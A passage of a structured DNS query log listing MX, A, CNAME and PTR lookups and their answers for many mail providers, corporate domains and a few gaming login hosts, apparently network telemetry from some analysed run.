1120 "data": "mail10.mailtwo.com",
1121 "type": "MX"
1122
1123
1124 "data": "mail06.mailtwo.com",
1125 "type": "MX"
1126
1127
1128 "data": "mail07.mailtwo.com",
1129 "type": "MX"
1130
1131
1132 "data": "mail09.mailtwo.com",
1133 "type": "MX"
1134
1135
1136 "data": "mail03.mailtwo.com",
1137 "type": "MX"
1138
1139
1140 "data": "mail08.mailtwo.com",
1141 "type": "MX"
1142
1143
1144 "data": "mail01.mailtwo.com",
1145 "type": "MX"
1146
1147
1148 "data": "mail02.mailtwo.com",
1149 "type": "MX"
1150
1151
1152
1153
1154 "type": "A",
1155 "request": "mail01.mailtwo.com",
1156 "answers":
1157
1158 "data": "216.129.105.38",
1159 "type": "A"
1160
1161
1162
1163
1164 "type": "MX",
1165 "request": "hotmail.com",
1166 "answers":
1167
1168 "data": "hotmail-com.olc.protection.outlook.com",
1169 "type": "MX"
1170
1171
1172
1173
1174 "type": "A",
1175 "request": "hotmail-com.olc.protection.outlook.com",
1176 "answers":
1177
1178 "data": "104.47.40.33",
1179 "type": "A"
1180
1181
1182 "data": "104.47.41.33",
1183 "type": "A"
1184
1185
1186 "data": "104.47.38.33",
1187 "type": "A"
1188
1189
1190 "data": "104.47.37.33",
1191 "type": "A"
1192
1193
1194 "data": "104.47.125.33",
1195 "type": "A"
1196
1197
1198 "data": "104.47.124.33",
1199 "type": "A"
1200
1201
1202 "data": "104.47.36.33",
1203 "type": "A"
1204
1205
1206
1207
1208 "type": "MX",
1209 "request": "hotmail.co.uk",
1210 "answers":
1211
1212 "data": "eur.olc.protection.outlook.com",
1213 "type": "MX"
1214
1215
1216
1217
1218 "type": "A",
1219 "request": "eur.olc.protection.outlook.com",
1220 "answers":
1221
1222 "data": "104.47.125.33",
1223 "type": "A"
1224
1225
1226 "data": "104.47.124.33",
1227 "type": "A"
1228
1229
1230 "data": "104.47.8.33",
1231 "type": "A"
1232
1233
1234 "data": "104.47.10.33",
1235 "type": "A"
1236
1237
1238 "data": "104.47.2.33",
1239 "type": "A"
1240
1241
1242 "data": "104.47.1.33",
1243 "type": "A"
1244
1245
1246 "data": "104.47.6.33",
1247 "type": "A"
1248
1249
1250 "data": "104.47.4.33",
1251 "type": "A"
1252
1253
1254
1255
1256 "type": "MX",
1257 "request": "ig.com.br",
1258 "answers":
1259
1260 "data": "mx3.ig.correio.biz",
1261 "type": "MX"
1262
1263
1264 "data": "mx2.ig.correio.biz",
1265 "type": "MX"
1266
1267
1268 "data": "mx4.ig.correio.biz",
1269 "type": "MX"
1270
1271
1272 "data": "mx1.ig.correio.biz",
1273 "type": "MX"
1274
1275
1276
1277
1278 "type": "A",
1279 "request": "mx1.ig.correio.biz",
1280 "answers":
1281
1282 "data": "177.153.23.241",
1283 "type": "A"
1284
1285
1286
1287
1288 "type": "MX",
1289 "request": "ntlworld.com",
1290 "answers":
1291
1292 "data": "mx.mnd.ukmail.iss.as9143.net",
1293 "type": "MX"
1294
1295
1296 "data": "mx.tb.ukmail.iss.as9143.net",
1297 "type": "MX"
1298
1299
1300
1301
1302 "type": "A",
1303 "request": "mx.mnd.ukmail.iss.as9143.net",
1304 "answers":
1305
1306 "data": "212.54.58.11",
1307 "type": "A"
1308
1309
1310
1311
1312 "type": "MX",
1313 "request": "whitehydraulics.com",
1314 "answers":
1315
1316 "data": "whitehydraulics-com.mail.protection.outlook.com",
1317 "type": "MX"
1318
1319
1320
1321
1322 "type": "A",
1323 "request": "whitehydraulics-com.mail.protection.outlook.com",
1324 "answers":
1325
1326 "data": "104.47.6.36",
1327 "type": "A"
1328
1329
1330 "data": "104.47.4.36",
1331 "type": "A"
1332
1333
1334
1335
1336 "type": "MX",
1337 "request": "tmail.com",
1338 "answers":
1339
1340
1341 "type": "A",
1342 "request": "mx3.hotmail.com",
1343 "answers":
1344
1345 "data": "65.55.92.168",
1346 "type": "A"
1347
1348
1349 "data": "65.55.37.120",
1350 "type": "A"
1351
1352
1353 "data": "104.44.194.236",
1354 "type": "A"
1355
1356
1357 "data": "65.55.37.72",
1358 "type": "A"
1359
1360
1361 "data": "65.54.188.94",
1362 "type": "A"
1363
1364
1365 "data": "65.55.92.152",
1366 "type": "A"
1367
1368
1369 "data": "104.44.194.237",
1370 "type": "A"
1371
1372
1373 "data": "65.54.188.110",
1374 "type": "A"
1375
1376
1377 "data": "65.54.188.72",
1378 "type": "A"
1379
1380
1381 "data": "104.44.194.233",
1382 "type": "A"
1383
1384
1385 "data": "104.44.194.231",
1386 "type": "A"
1387
1388
1389 "data": "104.44.194.232",
1390 "type": "A"
1391
1392
1393 "data": "207.46.8.199",
1394 "type": "A"
1395
1396
1397 "data": "104.44.194.235",
1398 "type": "A"
1399
1400
1401 "data": "65.55.37.104",
1402 "type": "A"
1403
1404
1405 "data": "104.44.194.234",
1406 "type": "A"
1407
1408
1409 "data": "65.55.92.136",
1410 "type": "A"
1411
1412
1413
1414
1415 "type": "A",
1416 "request": "auth.riotgames.com",
1417 "answers":
1418
1419 "data": "104.16.120.50",
1420 "type": "A"
1421
1422
1423 "data": "104.16.119.50",
1424 "type": "A"
1425
1426
1427 "data": "auth.riotgames.com.cdn.cloudflare.net",
1428 "type": "CNAME"
1429
1430
1431
1432
1433 "type": "MX",
1434 "request": "google.com",
1435 "answers":
1436
1437 "data": "alt4.aspmx.l.google.com",
1438 "type": "MX"
1439
1440
1441 "data": "alt3.aspmx.l.google.com",
1442 "type": "MX"
1443
1444
1445 "data": "alt2.aspmx.l.google.com",
1446 "type": "MX"
1447
1448
1449 "data": "alt1.aspmx.l.google.com",
1450 "type": "MX"
1451
1452
1453 "data": "aspmx.l.google.com",
1454 "type": "MX"
1455
1456
1457
1458
1459 "type": "MX",
1460 "request": "hotmail.it",
1461 "answers":
1462
1463 "data": "eur.olc.protection.outlook.com",
1464 "type": "MX"
1465
1466
1467
1468
1469 "type": "MX",
1470 "request": "allstate.com",
1471 "answers":
1472
1473 "data": "vap0132.allstate.com",
1474 "type": "MX"
1475
1476
1477 "data": "vap0118.allstate.com",
1478 "type": "MX"
1479
1480
1481 "data": "vap0129.allstate.com",
1482 "type": "MX"
1483
1484
1485 "data": "vap0119.allstate.com",
1486 "type": "MX"
1487
1488
1489 "data": "vap0130.allstate.com",
1490 "type": "MX"
1491
1492
1493 "data": "vap0131.allstate.com",
1494 "type": "MX"
1495
1496
1497 "data": "vap0120.allstate.com",
1498 "type": "MX"
1499
1500
1501 "data": "vap0121.allstate.com",
1502 "type": "MX"
1503
1504
1505
1506
1507 "type": "A",
1508 "request": "vap0132.allstate.com",
1509 "answers":
1510
1511 "data": "167.127.246.35",
1512 "type": "A"
1513
1514
1515
1516
1517 "type": "MX",
1518 "request": "gmail.com",
1519 "answers":
1520
1521 "data": "alt3.gmail-smtp-in.l.google.com",
1522 "type": "MX"
1523
1524
1525 "data": "gmail-smtp-in.l.google.com",
1526 "type": "MX"
1527
1528
1529 "data": "alt1.gmail-smtp-in.l.google.com",
1530 "type": "MX"
1531
1532
1533 "data": "alt4.gmail-smtp-in.l.google.com",
1534 "type": "MX"
1535
1536
1537 "data": "alt2.gmail-smtp-in.l.google.com",
1538 "type": "MX"
1539
1540
1541
1542
1543 "type": "MX",
1544 "request": "yahoo.com.tr",
1545 "answers":
1546
1547 "data": "mta5.am0.yahoodns.net",
1548 "type": "MX"
1549
1550
1551 "data": "mta7.am0.yahoodns.net",
1552 "type": "MX"
1553
1554
1555 "data": "mta6.am0.yahoodns.net",
1556 "type": "MX"
1557
1558
1559
1560
1561 "type": "A",
1562 "request": "mta5.am0.yahoodns.net",
1563 "answers":
1564
1565 "data": "67.195.228.94",
1566 "type": "A"
1567
1568
1569 "data": "74.6.137.64",
1570 "type": "A"
1571
1572
1573 "data": "67.195.228.109",
1574 "type": "A"
1575
1576
1577 "data": "98.137.159.25",
1578 "type": "A"
1579
1580
1581 "data": "98.137.159.24",
1582 "type": "A"
1583
1584
1585 "data": "98.137.159.28",
1586 "type": "A"
1587
1588
1589 "data": "66.218.85.52",
1590 "type": "A"
1591
1592
1593 "data": "67.195.228.110",
1594 "type": "A"
1595
1596
1597 "data": "74.6.137.65",
1598 "type": "A"
1599
1600
1601 "data": "67.195.228.111",
1602 "type": "A"
1603
1604
1605 "data": "98.137.159.27",
1606 "type": "A"
1607
1608
1609 "data": "98.137.159.26",
1610 "type": "A"
1611
1612
1613 "data": "67.195.228.106",
1614 "type": "A"
1615
1616
1617 "data": "66.218.85.139",
1618 "type": "A"
1619
1620
1621
1622
1623 "type": "MX",
1624 "request": "nireland.com",
1625 "answers":
1626
1627 "data": "alt1.aspmx.l.google.com",
1628 "type": "MX"
1629
1630
1631 "data": "aspmx2.googlemail.com",
1632 "type": "MX"
1633
1634
1635 "data": "alt2.aspmx.l.google.com",
1636 "type": "MX"
1637
1638
1639 "data": "aspmx3.googlemail.com",
1640 "type": "MX"
1641
1642
1643 "data": "aspmx.l.google.com",
1644 "type": "MX"
1645
1646
1647
1648
1649 "type": "MX",
1650 "request": "comcast.net",
1651 "answers":
1652
1653 "data": "mx2.comcast.net",
1654 "type": "MX"
1655
1656
1657 "data": "mx1.comcast.net",
1658 "type": "MX"
1659
1660
1661
1662
1663 "type": "A",
1664 "request": "mx1.comcast.net",
1665 "answers":
1666
1667 "data": "96.114.157.80",
1668 "type": "A"
1669
1670
1671
1672
1673 "type": "MX",
1674 "request": "netscape.net",
1675 "answers":
1676
1677 "data": "mx-aol.mail.gm0.yahoodns.net",
1678 "type": "MX"
1679
1680
1681
1682
1683 "type": "A",
1684 "request": "mx-aol.mail.gm0.yahoodns.net",
1685 "answers":
1686
1687 "data": "67.195.228.87",
1688 "type": "A"
1689
1690
1691 "data": "98.137.157.43",
1692 "type": "A"
1693
1694
1695 "data": "98.136.101.116",
1696 "type": "A"
1697
1698
1699 "data": "98.136.96.73",
1700 "type": "A"
1701
1702
1703 "data": "66.218.85.151",
1704 "type": "A"
1705
1706
1707 "data": "74.6.141.40",
1708 "type": "A"
1709
1710
1711
1712
1713 "type": "MX",
1714 "request": "skolekom.dk",
1715 "answers":
1716
1717 "data": "mx10.skolekom.dk",
1718 "type": "MX"
1719
1720
1721 "data": "mx30.skolekom.dk",
1722 "type": "MX"
1723
1724
1725 "data": "mx20.skolekom.dk",
1726 "type": "MX"
1727
1728
1729 "data": "mx40.skolekom.dk",
1730 "type": "MX"
1731
1732
1733
1734
1735 "type": "A",
1736 "request": "mx10.skolekom.dk",
1737 "answers":
1738
1739 "data": "195.231.225.143",
1740 "type": "A"
1741
1742
1743 "data": "195.231.225.144",
1744 "type": "A"
1745
1746
1747
1748
1749 "type": "MX",
1750 "request": "iksmedia.ru",
1751 "answers":
1752
1753 "data": "mx.yandex.ru",
1754 "type": "MX"
1755
1756
1757
1758
1759 "type": "MX",
1760 "request": "mail.ru",
1761 "answers":
1762
1763 "data": "mxs.mail.ru",
1764 "type": "MX"
1765
1766
1767
1768
1769 "type": "A",
1770 "request": "mx.yandex.ru",
1771 "answers":
1772
1773 "data": "213.180.204.89",
1774 "type": "A"
1775
1776
1777 "data": "87.250.250.89",
1778 "type": "A"
1779
1780
1781 "data": "93.158.134.89",
1782 "type": "A"
1783
1784
1785 "data": "213.180.193.89",
1786 "type": "A"
1787
1788
1789 "data": "77.88.21.89",
1790 "type": "A"
1791
1792
1793
1794
1795 "type": "MX",
1796 "request": "live.it",
1797 "answers":
1798
1799 "data": "eur.olc.protection.outlook.com",
1800 "type": "MX"
1801
1802
1803
1804
1805 "type": "A",
1806 "request": "mxs.mail.ru",
1807 "answers":
1808
1809 "data": "94.100.180.31",
1810 "type": "A"
1811
1812
1813 "data": "94.100.180.104",
1814 "type": "A"
1815
1816
1817
1818
1819 "type": "MX",
1820 "request": "naver.com",
1821 "answers":
1822
1823 "data": "mx3.naver.com",
1824 "type": "MX"
1825
1826
1827 "data": "mx2.naver.com",
1828 "type": "MX"
1829
1830
1831 "data": "mx1.naver.com",
1832 "type": "MX"
1833
1834
1835
1836
1837 "type": "A",
1838 "request": "mx1.naver.com",
1839 "answers":
1840
1841 "data": "125.209.238.100",
1842 "type": "A"
1843
1844
1845
1846
1847 "type": "MX",
1848 "request": "cox.net",
1849 "answers":
1850
1851 "data": "cxr.mx.a.cloudfilter.net",
1852 "type": "MX"
1853
1854
1855
1856
1857 "type": "A",
1858 "request": "cxr.mx.a.cloudfilter.net",
1859 "answers":
1860
1861 "data": "35.162.106.154",
1862 "type": "A"
1863
1864
1865 "data": "18.209.118.139",
1866 "type": "A"
1867
1868
1869 "data": "34.212.80.54",
1870 "type": "A"
1871
1872
1873 "data": "52.73.137.222",
1874 "type": "A"
1875
1876
1877
1878
1879 "type": "MX",
1880 "request": "sabre.com",
1881 "answers":
1882
1883 "data": "mxa-00257e01.gslb.pphosted.com",
1884 "type": "MX"
1885
1886
1887 "data": "mxb-00257e01.gslb.pphosted.com",
1888 "type": "MX"
1889
1890
1891
1892
1893 "type": "A",
1894 "request": "mxb-00257e01.gslb.pphosted.com",
1895 "answers":
1896
1897 "data": "148.163.158.123",
1898 "type": "A"
1899
1900
1901
1902
1903 "type": "A",
1904 "request": "mx2.hotmail.com",
1905 "answers":
1906
1907 "data": "104.44.194.237",
1908 "type": "A"
1909
1910
1911 "data": "65.55.37.120",
1912 "type": "A"
1913
1914
1915 "data": "65.55.33.135",
1916 "type": "A"
1917
1918
1919 "data": "104.44.194.236",
1920 "type": "A"
1921
1922
1923 "data": "65.54.188.94",
1924 "type": "A"
1925
1926
1927 "data": "104.44.194.232",
1928 "type": "A"
1929
1930
1931 "data": "65.55.92.152",
1932 "type": "A"
1933
1934
1935 "data": "104.44.194.231",
1936 "type": "A"
1937
1938
1939 "data": "65.54.188.72",
1940 "type": "A"
1941
1942
1943 "data": "104.44.194.233",
1944 "type": "A"
1945
1946
1947 "data": "65.55.37.88",
1948 "type": "A"
1949
1950
1951 "data": "207.46.8.199",
1952 "type": "A"
1953
1954
1955 "data": "65.55.92.184",
1956 "type": "A"
1957
1958
1959 "data": "65.55.37.104",
1960 "type": "A"
1961
1962
1963 "data": "104.44.194.235",
1964 "type": "A"
1965
1966
1967 "data": "104.44.194.234",
1968 "type": "A"
1969
1970
1971 "data": "65.55.92.136",
1972 "type": "A"
1973
1974
1975
1976
1977 "type": "MX",
1978 "request": "miki.ru",
1979 "answers":
1980
1981 "data": "mail.miki.ru",
1982 "type": "MX"
1983
1984
1985
1986
1987 "type": "A",
1988 "request": "mail.miki.ru",
1989 "answers":
1990
1991 "data": "mx1.relline.ru",
1992 "type": "CNAME"
1993
1994
1995 "data": "195.146.81.131",
1996 "type": "A"
1997
1998
1999
2000
2001 "type": "PTR",
2002 "request": "222.87.245.185.in-addr.arpa",
2003 "answers":
2004
2005 "data": "no-mans-land.m247.com",
2006 "type": "PTR"
2007
2008
2009
2010
2011 "type": "MX",
2012 "request": "earthlink.net",
2013 "answers":
2014
2015 "data": "mx8.earthlink.net",
2016 "type": "MX"
2017
2018
2019 "data": "mx9.earthlink.net",
2020 "type": "MX"
2021
2022
2023 "data": "mx6.earthlink.net",
2024 "type": "MX"
2025
2026
2027 "data": "mx7.earthlink.net",
2028 "type": "MX"
2029
2030
2031
2032
2033 "type": "A",
2034 "request": "mx8.earthlink.net",
2035 "answers":
2036
2037 "data": "207.69.189.231",
2038 "type": "A"
2039
2040
2041
2042
2043 "type": "MX",
2044 "request": "nfm.com",
2045 "answers":
2046
2047 "data": "mx1.hc187824.iphmx.com",
2048 "type": "MX"
2049
2050
2051 "data": "mx2.hc187824.iphmx.com",
2052 "type": "MX"
2053
2054
2055
2056
2057 "type": "A",
2058 "request": "mx2.hc187824.iphmx.com",
2059 "answers":
2060
2061 "data": "216.71.152.173",
2062 "type": "A"
2063
2064
2065 "data": "68.232.149.160",
2066 "type": "A"
2067
2068
2069
2070
2071 "type": "MX",
2072 "request": "hillsidefamily.com",
2073 "answers":
2074
2075
2076 "type": "MX",
2077 "request": "utz.ru",
2078 "answers":
2079
2080 "data": "mail.utz.ru",
2081 "type": "MX"
2082
2083
2084
2085
2086 "type": "A",
2087 "request": "mail.utz.ru",
2088 "answers":
2089
2090 "data": "212.23.88.242",
2091 "type": "A"
2092
2093
2094
2095
2096 "type": "MX",
2097 "request": "centre.edu",
2098 "answers":
2099
2100 "data": "barracuda.centre.edu",
2101 "type": "MX"
2102
2103
2104
2105
2106 "type": "A",
2107 "request": "barracuda.centre.edu",
2108 "answers":
2109
2110 "data": "192.102.218.8",
2111 "type": "A"
2112
2113
2114
2115
2116 "type": "MX",
2117 "request": "target.com",
2118 "answers":
2119
2120 "data": "smtp01.target.com",
2121 "type": "MX"
2122
2123
2124 "data": "smtp02.target.com",
2125 "type": "MX"
2126
2127
2128
2129
2130 "type": "A",
2131 "request": "smtp01.target.com",
2132 "answers":
2133
2134 "data": "161.225.202.27",
2135 "type": "A"
2136
2137
2138
2139
2140 "type": "MX",
2141 "request": "inbox.ru",
2142 "answers":
2143
2144 "data": "mxs.mail.ru",
2145 "type": "MX"
2146
2147
2148
2149
2150 "type": "A",
2151 "request": "mx4.hotmail.com",
2152 "answers":
2153
2154 "data": "65.55.92.168",
2155 "type": "A"
2156
2157
2158 "data": "65.55.37.120",
2159 "type": "A"
2160
2161
2162 "data": "104.44.194.236",
2163 "type": "A"
2164
2165
2166 "data": "65.55.37.72",
2167 "type": "A"
2168
2169
2170 "data": "65.54.188.94",
2171 "type": "A"
2172
2173
2174 "data": "104.44.194.232",
2175 "type": "A"
2176
2177
2178 "data": "65.55.92.152",
2179 "type": "A"
2180
2181
2182 "data": "104.44.194.231",
2183 "type": "A"
2184
2185
2186 "data": "65.54.188.110",
2187 "type": "A"
2188
2189
2190 "data": "104.44.194.237",
2191 "type": "A"
2192
2193
2194 "data": "65.55.33.135",
2195 "type": "A"
2196
2197
2198 "data": "104.44.194.233",
2199 "type": "A"
2200
2201
2202 "data": "65.55.37.88",
2203 "type": "A"
2204
2205
2206 "data": "207.46.8.199",
2207 "type": "A"
2208
2209
2210 "data": "65.55.92.184",
2211 "type": "A"
2212
2213
2214 "data": "104.44.194.235",
2215 "type": "A"
2216
2217
2218 "data": "104.44.194.234",
2219 "type": "A"
2220
2221
2222
2223
2224 "type": "MX",
2225 "request": "sohu.com",
2226 "answers":
2227
2228 "data": "sohumx2.sohu.com",
2229 "type": "MX"
2230
2231
2232 "data": "sohumx.h.a.sohu.com",
2233 "type": "MX"
2234
2235
2236 "data": "sohumx1.sohu.com",
2237 "type": "MX"
2238
2239
2240
2241
2242 "type": "A",
2243 "request": "sohumx1.sohu.com",
2244 "answers":
2245
2246 "data": "111.202.126.109",
2247 "type": "A"
2248
2249
2250 "data": "36.110.185.79",
2251 "type": "A"
2252
2253
2254
2255
2256 "type": "MX",
2257 "request": "johndeere.com",
2258 "answers":
2259
2260 "data": "mxa-000e4101.gslb.pphosted.com",
2261 "type": "MX"
2262
2263
2264 "data": "mxb-000e4101.gslb.pphosted.com",
2265 "type": "MX"
2266
2267
2268
2269
2270 "type": "A",
2271 "request": "mxb-000e4101.gslb.pphosted.com",
2272 "answers":
2273
2274 "data": "67.231.152.47",
2275 "type": "A"
2276
2277
2278 "data": "67.231.144.73",
2279 "type": "A"
2280
2281
2282
2283
2284 "type": "MX",
2285 "request": "optonline.net",
2286 "answers":
2287
2288 "data": "mx.optimum.net",
2289 "type": "MX"
2290
2291
2292
2293
2294 "type": "A",
2295 "request": "mx.optimum.net",
2296 "answers":
2297
2298 "data": "167.206.4.79",
2299 "type": "A"
2300
2301
2302 "data": "167.206.4.77",
2303 "type": "A"
2304
2305
2306
2307
2308 "type": "MX",
2309 "request": "vnet.ibm.com",
2310 "answers":
2311
2312 "data": "mx0b-001b2d01.pphosted.com",
2313 "type": "MX"
2314
2315
2316 "data": "mx0a-001b2d01.pphosted.com",
2317 "type": "MX"
2318
2319
2320
2321
2322 "type": "A",
2323 "request": "mx0a-001b2d01.pphosted.com",
2324 "answers":
2325
2326 "data": "148.163.156.1",
2327 "type": "A"
2328
2329
2330
2331
2332 "type": "MX",
2333 "request": "hotmail.de",
2334 "answers":
2335
2336 "data": "eur.olc.protection.outlook.com",
2337 "type": "MX"
2338
2339
2340
2341
2342 "type": "MX",
2343 "request": "radugavl.ru",
2344 "answers":
2345
2346 "data": "mail.radugavl.ru",
2347 "type": "MX"
2348
2349
2350
2351
2352 "type": "A",
2353 "request": "mail.radugavl.ru",
2354 "answers":
2355
2356
2357 "type": "MX",
2358 "request": "aol.com",
2359 "answers":
2360
2361 "data": "mx-aol.mail.gm0.yahoodns.net",
2362 "type": "MX"
2363
2364
2365
2366
2367 "type": "MX",
2368 "request": "btinternet.com",
2369 "answers":
2370
2371 "data": "mx.lb.btinternet.com",
2372 "type": "MX"
2373
2374
2375
2376
2377 "type": "A",
2378 "request": "mx.lb.btinternet.com",
2379 "answers":
2380
2381 "data": "213.120.69.2",
2382 "type": "A"
2383
2384
2385
2386
2387 "type": "MX",
2388 "request": "nasd.com",
2389 "answers":
2390
2391 "data": "mxb-0009b601.gslb.pphosted.com",
2392 "type": "MX"
2393
2394
2395 "data": "mxa-0009b601.gslb.pphosted.com",
2396 "type": "MX"
2397
2398
2399
2400
2401 "type": "A",
2402 "request": "mxa-0009b601.gslb.pphosted.com",
2403 "answers":
2404
2405 "data": "67.231.148.237",
2406 "type": "A"
2407
2408
2409 "data": "67.231.156.236",
2410 "type": "A"
2411
2412
2413
2414
2415 "type": "A",
2416 "request": "nolive.ir",
2417 "answers":
2418
2419 "data": "94.130.209.113",
2420 "type": "A"
2421
2422
2423
2424
2425 "type": "A",
2426 "request": "signin.ea.com",
2427 "answers":
2428
2429 "data": "159.153.191.239",
2430 "type": "A"
2431
2432
2433
2434
2435 "type": "MX",
2436 "request": "rosttreid.ru",
2437 "answers":
2438
2439 "data": "",
2440 "type": "NXDOMAIN"
2441
2442
2443
2444
2445 "type": "MX",
2446 "request": "il.uu.net",
2447 "answers":
2448
2449 "data": "mx0b-0024a201.pphosted.com",
2450 "type": "MX"
2451
2452
2453 "data": "mx0a-0024a201.pphosted.com",
2454 "type": "MX"
2455
2456
2457
2458
2459 "type": "A",
2460 "request": "mx0a-0024a201.pphosted.com",
2461 "answers":
2462
2463 "data": "148.163.149.93",
2464 "type": "A"
2465
2466
2467
2468
2469 "type": "MX",
2470 "request": "wedding-rnd.ru",
2471 "answers":
2472
2473 "data": "mx.yandex.ru",
2474 "type": "MX"
2475
2476
2477
2478
2479 "type": "MX",
2480 "request": "q.com",
2481 "answers":
2482
2483 "data": "mx.centurylink.net",
2484 "type": "MX"
2485
2486
2487
2488
2489 "type": "A",
2490 "request": "mx.centurylink.net",
2491 "answers":
2492
2493 "data": "206.152.134.65",
2494 "type": "A"
2495
2496
2497
2498
2499 "type": "MX",
2500 "request": "janedwardsmkt.com",
2501 "answers":
2502
2503 "data": "janedwardsmkt.com",
2504 "type": "MX"
2505
2506
2507 "data": "smtp.janedwardsmkt.com",
2508 "type": "MX"
2509
2510
2511
2512
2513 "type": "A",
2514 "request": "janedwardsmkt.com",
2515 "answers":
2516
2517 "data": "45.56.121.201",
2518 "type": "A"
2519
2520
2521
2522
2523 "type": "MX",
2524 "request": "qip.ru",
2525 "answers":
2526
2527 "data": "mx.yandex.net",
2528 "type": "MX"
2529
2530
2531
2532
2533 "type": "A",
2534 "request": "mx.yandex.net",
2535 "answers":
2536
2537 "data": "213.180.204.89",
2538 "type": "A"
2539
2540
2541 "data": "87.250.250.89",
2542 "type": "A"
2543
2544
2545 "data": "93.158.134.89",
2546 "type": "A"
2547
2548
2549 "data": "213.180.193.89",
2550 "type": "A"
2551
2552
2553 "data": "77.88.21.89",
2554 "type": "A"
2555
2556
2557
2558
2559 "type": "MX",
2560 "request": "johnlscott.com",
2561 "answers":
2562
2563 "data": "johnlscott-com.mail.protection.outlook.com",
2564 "type": "MX"
2565
2566
2567 "data": "mxa-0014d001.gslb.pphosted.com",
2568 "type": "MX"
2569
2570
2571 "data": "mxb-0014d001.gslb.pphosted.com",
2572 "type": "MX"
2573
2574
2575
2576
2577 "type": "A",
2578 "request": "johnlscott-com.mail.protection.outlook.com",
2579 "answers":
2580
2581 "data": "104.47.40.36",
2582 "type": "A"
2583
2584
2585 "data": "104.47.41.36",
2586 "type": "A"
2587
2588
2589
2590
2591 "type": "MX",
2592 "request": "chattem.com",
2593 "answers":
2594
2595 "data": "xspz10f562b.sanofi.com",
2596 "type": "MX"
2597
2598
2599 "data": "xspz10p851w.sanofi.com",
2600 "type": "MX"
2601
2602
2603 "data": "xspz11s656b.sanofi.com",
2604 "type": "MX"
2605
2606
2607 "data": "xspz10k458s.sanofi.com",
2608 "type": "MX"
2609
2610
2611 "data": "xspz10p120b.sanofi.com",
2612 "type": "MX"
2613
2614
2615 "data": "xspz10k428f.sanofi.com",
2616 "type": "MX"
2617
2618
2619 "data": "xspz11s657k.sanofi.com",
2620 "type": "MX"
2621
2622
2623 "data": "xspz10f564t.sanofi.com",
2624 "type": "MX"
2625
2626
2627 "data": "xspz10p119t.sanofi.com",
2628 "type": "MX"
2629
2630
2631 "data": "xspz10p852b.sanofi.com",
2632 "type": "MX"
2633
2634
2635
2636
2637 "type": "A",
2638 "request": "xspz10f564t.sanofi.com",
2639 "answers":
2640
2641 "data": "205.137.77.32",
2642 "type": "A"
2643
2644
2645
2646
2647 "type": "MX",
2648 "request": "janefollis.com",
2649 "answers":
2650
2651 "data": "mail.janefollis.com",
2652 "type": "MX"
2653
2654
2655
2656
2657 "type": "A",
2658 "request": "mail.janefollis.com",
2659 "answers":
2660
2661 "data": "149.255.58.37",
2662 "type": "A"
2663
2664
2665
2666
2667 "type": "MX",
2668 "request": "kvartstroy.ru",
2669 "answers":
2670
2671 "data": "mail.kvartstroy.ru",
2672 "type": "MX"
2673
2674
2675
2676
2677 "type": "A",
2678 "request": "mail.kvartstroy.ru",
2679 "answers":
2680
2681 "data": "89.175.32.82",
2682 "type": "A"
2683
2684
2685
2686
2687 "type": "MX",
2688 "request": "linklaters.com",
2689 "answers":
2690
2691 "data": "mxb-00174601.gslb.pphosted.com",
2692 "type": "MX"
2693
2694
2695 "data": "mxa-00174601.gslb.pphosted.com",
2696 "type": "MX"
2697
2698
2699
2700
2701 "type": "A",
2702 "request": "mxb-00174601.gslb.pphosted.com",
2703 "answers":
2704
2705 "data": "91.207.212.87",
2706 "type": "A"
2707
2708
2709
2710
2711 "type": "MX",
2712 "request": "hanmail.net",
2713 "answers":
2714
2715 "data": "mx1.hanmail.net",
2716 "type": "MX"
2717
2718
2719 "data": "mx3.hanmail.net",
2720 "type": "MX"
2721
2722
2723 "data": "mx2.hanmail.net",
2724 "type": "MX"
2725
2726
2727 "data": "mx4.hanmail.net",
2728 "type": "MX"
2729
2730
2731
2732
2733 "type": "A",
2734 "request": "mx3.hanmail.net",
2735 "answers":
2736
2737 "data": "211.231.108.47",
2738 "type": "A"
2739
2740
2741
2742
2743 "type": "MX",
2744 "request": "gotmail.org",
2745 "answers":
2746
2747 "data": "smtp.secureserver.net",
2748 "type": "MX"
2749
2750
2751 "data": "mailstore1.secureserver.net",
2752 "type": "MX"
2753
2754
2755
2756
2757 "type": "A",
2758 "request": "smtp.secureserver.net",
2759 "answers":
2760
2761 "data": "68.178.213.203",
2762 "type": "A"
2763
2764
2765 "data": "68.178.213.37",
2766 "type": "A"
2767
2768
2769 "data": "72.167.238.29",
2770 "type": "A"
2771
2772
2773
2774
2775 "type": "MX",
2776 "request": "intersources.net",
2777 "answers":
2778
2779 "data": "",
2780 "type": "NXDOMAIN"
2781
2782
2783
2784
2785 "type": "MX",
2786 "request": "excite.com",
2787 "answers":
2788
2789 "data": "mail-in-excite.roc2.bluetie.com",
2790 "type": "MX"
2791
2792
2793
2794
2795 "type": "A",
2796 "request": "mail-in-excite.roc2.bluetie.com",
2797 "answers":
2798
2799 "data": "208.89.132.27",
2800 "type": "A"
2801
2802
2803
2804
2805 "type": "MX",
2806 "request": "bredtv.ru",
2807 "answers":
2808
2809
2810 "type": "MX",
2811 "request": "lilex-air.com",
2812 "answers":
2813
2814 "data": "mxlb.ispgateway.de",
2815 "type": "MX"
2816
2817
2818
2819
2820 "type": "A",
2821 "request": "mxlb.ispgateway.de",
2822 "answers":
2823
2824 "data": "80.67.18.126",
2825 "type": "A"
2826
2827
2828
2829
2830 "type": "MX",
2831 "request": "email.uncc.edu",
2832 "answers":
2833
2834
2835 "type": "MX",
2836 "request": "bk.ru",
2837 "answers":
2838
2839 "data": "mxs.mail.ru",
2840 "type": "MX"
2841
2842
2843
2844
2845 "type": "MX",
2846 "request": "landmark-grpbd.com",
2847 "answers":
2848
2849 "data": "mail.landmark-grpbd.com",
2850 "type": "MX"
2851
2852
2853 "data": "spamwall.dhakacom.com",
2854 "type": "MX"
2855
2856
2857
2858
2859 "type": "A",
2860 "request": "spamwall.dhakacom.com",
2861 "answers":
2862
2863 "data": "202.4.96.26",
2864 "type": "A"
2865
2866
2867
2868
2869 "type": "MX",
2870 "request": "interwork.sdsu.edu",
2871 "answers":
2872
2873 "data": "interwork.sdsu.edu",
2874 "type": "MX"
2875
2876
2877
2878
2879 "type": "A",
2880 "request": "interwork.sdsu.edu",
2881 "answers":
2882
2883 "data": "71.6.142.100",
2884 "type": "A"
2885
2886
2887
2888
2889 "type": "MX",
2890 "request": "moc.edu",
2891 "answers":
2892
2893 "data": "us-smtp-inbound-1.mimecast.com",
2894 "type": "MX"
2895
2896
2897 "data": "us-smtp-inbound-2.mimecast.com",
2898 "type": "MX"
2899
2900
2901
2902
2903 "type": "MX",
2904 "request": "status-graphite.com",
2905 "answers":
2906
2907 "data": "mx1.123-reg.co.uk",
2908 "type": "MX"
2909
2910
